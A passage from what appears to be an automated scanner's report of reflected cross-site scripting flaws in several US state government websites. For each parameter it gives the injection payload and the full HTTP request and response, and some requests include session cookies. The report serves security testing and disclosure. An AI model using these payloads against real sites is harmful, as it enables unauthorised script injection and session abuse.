Date: Sat, 30 Apr 2011 11:24:55 GMT
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJSdee3d<script>alert(1)</script>8660aed3ca9
//path:
//################################################################


3.108. http://www.nysegov.com/citGuide.cfm [content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d19"><script>alert(1)</script>6c86872287c was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citGuide.cfm?superCat=119&cat=411&content=maind7d19"><script>alert(1)</script>6c86872287c HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101047966.1304117404.1.1.utmcsr=ny.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=101047966.182442221.1304117404.1304117404.1304117404.1; __utmc=101047966; __utmb=101047966.1.10.1304117404

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<a href="/citGuide.cfm?superCat=119&content=maind7d19"><script>alert(1)</script>6c86872287c"
                title="Housing"
                style="font-weight:bold">
...[SNIP]...

3.109. http://www.nysegov.com/citGuide.cfm [superCat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the superCat request parameter is copied into an HTML comment. The payload 801f8--><img%20src%3da%20onerror%3dalert(1)>c8077f981fe was submitted in the superCat parameter. This input was echoed as 801f8--><img src=a onerror=alert(1)>c8077f981fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /citGuide.cfm?superCat=119801f8--><img%20src%3da%20onerror%3dalert(1)>c8077f981fe HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
Referer: http://ny.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Banner Error Handler Page</title>
</head>

<body>
<table background="http://www.nysegov.com/images/pi
...[SNIP]...
<!--

Element 119801f8--><img src=a onerror=alert(1)>c8077f981fe is undefined in a CFML structure referenced as part of an expression. <br>
...[SNIP]...

3.110. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx [Resource parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.UI.Resources.aspx

Issue detail

The value of the Resource request parameter is copied into the HTML document as plain text between tags. The payload 4bb77<script>alert(1)</script>116c5323795 was submitted in the Resource parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SCBOS.Core.Framework.Web.UI.Resources.aspx?Resource=xbrowser.js4bb77<script>alert(1)</script>116c5323795&Type=javascript HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www.scsignon.sc.gov/?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Accept-Ranges: bytes
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:07:29 GMT
Content-Length: 217

alert("Could not load resource 'xbrowser.js4bb77<script>alert(1)</script>116c5323795': The resource 'xbrowser.js4bb77<script>alert(1)</script>116c5323795' was not found by SCBOS.Core.Framework.Web.UI.
...[SNIP]...

3.111. http://www.sled.state.sc.us/sled/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sled.state.sc.us
Path:   /sled/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8873<a%20b%3dc>fab5232803f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8873<a b=c>fab5232803f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sled/default.asp?b8873<a%20b%3dc>fab5232803f=1 HTTP/1.1
Host: www.sled.state.sc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 779
Content-Type: text/html
Set-Cookie: CISESSIONID=9379671bc4a2e62295ab3ef459e1783dICE383; path=/
Set-Cookie: ASPSESSIONIDASDSSDTS=CGNHDODBAOHAGHJBGOMGFGJK; path=/
Cache-control: private

<HTML><HEAD><TITLE>SLED Web Site Error Message</TITLE><style type=text/css>FONT {FONT-SIZE: 12px; FONT-FAMILY: Verdana,Helvetica}</style></HEAD><BODY><hr><br><B><font>Error Description:</font><br></B>
...[SNIP]...
<P>Keyword/name used is: 'b8873<a b=c>fab5232803f'. <p>
...[SNIP]...

3.112. http://www.state.mn.us/portal/mn/jsp/content.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/content.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b29"-alert(1)-"e4d6f19fe22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/content.do?26b29"-alert(1)-"e4d6f19fe22=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0773244517.1304167233@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 140
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='content.do?26b29"-alert(1)-"e4d6f19fe22=1'",100);
</SCRIPT>



3.113. http://www.state.mn.us/portal/mn/jsp/contentprocess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/contentprocess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f2c"-alert(1)-"c7409e96eae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/contentprocess.do?82f2c"-alert(1)-"c7409e96eae=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0818237359.1304167233@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?82f2c"-alert(1)-"c7409e96eae=1'",100);
</SCRIPT>



3.114. http://www.state.mn.us/portal/mn/jsp/home.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/home.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c61e"-alert(1)-"fd8aeb3c20e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/home.do?9c61e"-alert(1)-"fd8aeb3c20e=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0910739485.1304167234@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 137
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='home.do?9c61e"-alert(1)-"fd8aeb3c20e=1'",100);
</SCRIPT>



3.115. http://www.state.mn.us/portal/mn/jsp/hybrid.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/hybrid.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df818"-alert(1)-"70286dbfd63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/hybrid.do?df818"-alert(1)-"70286dbfd63=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:35 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0293230763.1304167235@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 139
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='hybrid.do?df818"-alert(1)-"70286dbfd63=1'",100);
</SCRIPT>



3.116. http://www.state.mn.us/portal/mn/jsp/logon.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/logon.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 339bf"-alert(1)-"5b00271e634 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/logon.do?339bf"-alert(1)-"5b00271e634=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:36 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1277276779.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?339bf"-alert(1)-"5b00271e634=1'",100);
</SCRIPT>



3.117. http://www.state.mn.us/portal/mn/jsp/redirectLink.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/redirectLink.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a73e"-alert(1)-"71daca0d366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/redirectLink.do?8a73e"-alert(1)-"71daca0d366=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:36 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1588434861.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?8a73e"-alert(1)-"71daca0d366=1'",100);
</SCRIPT>



3.118. http://www.state.mn.us/portal/mn/jsp/search.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/search.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f31e6"-alert(1)-"438c500b4c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/search.do?f31e6"-alert(1)-"438c500b4c3=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:37 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0437518863.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?f31e6"-alert(1)-"438c500b4c3=1'",100);
</SCRIPT>



3.119. https://www.vermontjoblink.com/ada/leavesite.cfm [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b was submitted in the url parameter. This input was echoed as a8d7a"style="x:expression(alert(1))"0a17ee4770b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2Fa8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="http://www.act.org/certificate/a8d7a"style="x:expression(alert(1))"0a17ee4770b" target="_blank">
...[SNIP]...

3.120. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [rand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3251d"style%3d"x%3aexpression(alert(1))"958bb28727d was submitted in the rand parameter. This input was echoed as 3251d"style="x:expression(alert(1))"958bb28727d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/mn_eligibility_dsp.cfm?rand=1688523251d"style%3d"x%3aexpression(alert(1))"958bb28727d HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="1688523251d"style="x:expression(alert(1))"958bb28727d" />
...[SNIP]...

3.121. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [BLTEXTBOXEXTRADONOTUSE1_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the BLTEXTBOXEXTRADONOTUSE1_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691 was submitted in the BLTEXTBOXEXTRADONOTUSE1_prev parameter. This input was echoed as c5253"style="x:expression(alert(1))"6a3bba82691 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
SSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
